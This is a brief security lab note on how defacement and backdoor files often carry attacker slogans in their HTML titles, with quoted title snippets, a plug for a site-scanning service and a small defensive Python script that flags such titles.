Titles, Imprints and Marks Left by Attackers

Labs Note

Some attackers seem to like signing their scripts. This is especially true for defacements and backdoors, where attackers show their pride in having “owned” a site by signing their own malware. Sometimes they put their slogans and nicknames in the title or in the middle of the file:

<title>Ow3nd </title><center><div id=q>Your Site Has Been Ow3nd By ...

Or, as in this malware sample:

<title>#Pwned</title><p> ... </p><h3> ... ownz you</h3> ...

Or even the classic one:

<title>Hacked by …

We have seen thousands of defacement title variations (and even more backdoor patterns), and still we find new variations every day.

By looking at a file’s title, we may be able to tell if a file is malware. Most of the time, though, finding malware requires much deeper scanning, decryption and deobfuscation, which makes the task difficult and time-consuming. If you don’t use such scanning and want to make sure you didn’t miss any defacements or backdoors on your server, you can have us scan your site for thousands of different malware patterns.
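A minimal title-and-heading check of the kind described above, written as an added example and not taken from our scanner. The signature names, the `MarkExtractor` and `scan_html` helpers and the sample file names are assumptions made for illustration; the sample inputs are the three snippets quoted above plus one constructed benign page.

```python
import re
from html.parser import HTMLParser

# Constructed signatures; "owned" must end the text or precede "by" to cut noise.
SIGNATURES = {
    "owned": re.compile(r"\b[o0]w[e3]?n[e3]?d\b(?:\s+by\b|\s*$)", re.I),
    "pwned": re.compile(r"\bpwn[e3]?d\b", re.I),
    "hacked-by": re.compile(r"\bh[a4@]ck[e3]d\s+by\b", re.I),
    "ownz-you": re.compile(r"\b[o0]wn[zs]\s+y[o0]u\b", re.I),
}
WATCHED_TAGS = {"title", "h1", "h2", "h3"}
# Constructed inputs: the three snippets quoted above plus one benign page.
SAMPLES = {
    "a.html": "<title>Ow3nd </title><center><div id=q>Your Site Has Been Ow3nd By ...",
    "b.html": "<title>#Pwned</title><p> ... </p><h3> ... ownz you</h3> ...",
    "c.html": "<title>Hacked by …",
    "d.html": "<title>Family Owned Bakery</title><h1>Welcome</h1>",
}

class MarkExtractor(HTMLParser):
    """Collect <title> and <h1>-<h3> text, tolerating unclosed tags."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.open_tag, self.found = None, []  # found: [(tag, [text parts])]
    def handle_starttag(self, tag, attrs):
        if tag in WATCHED_TAGS:
            self.open_tag = tag
            self.found.append((tag, []))
    def handle_endtag(self, tag):
        if tag == self.open_tag:
            self.open_tag = None
    def handle_data(self, data):
        if self.open_tag:
            self.found[-1][1].append(data)

def scan_html(html):
    """Return sorted (tag, signature) hits for one file's contents."""
    parser = MarkExtractor()
    parser.feed(html)
    parser.close()  # flush text buffered for an unclosed <title>
    hits = set()
    for tag, parts in parser.found:
        text = " ".join("".join(parts).split())  # collapse whitespace
        hits.update((tag, n) for n, rx in SIGNATURES.items() if rx.search(text))
    return sorted(hits)

if __name__ == "__main__":
    for name, html in SAMPLES.items():
        print(name, scan_html(html) or "clean")
```

A hit is a lead for manual review rather than a verdict, and an empty result says nothing about obfuscated or encrypted payloads, which need the deeper scanning mentioned above.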
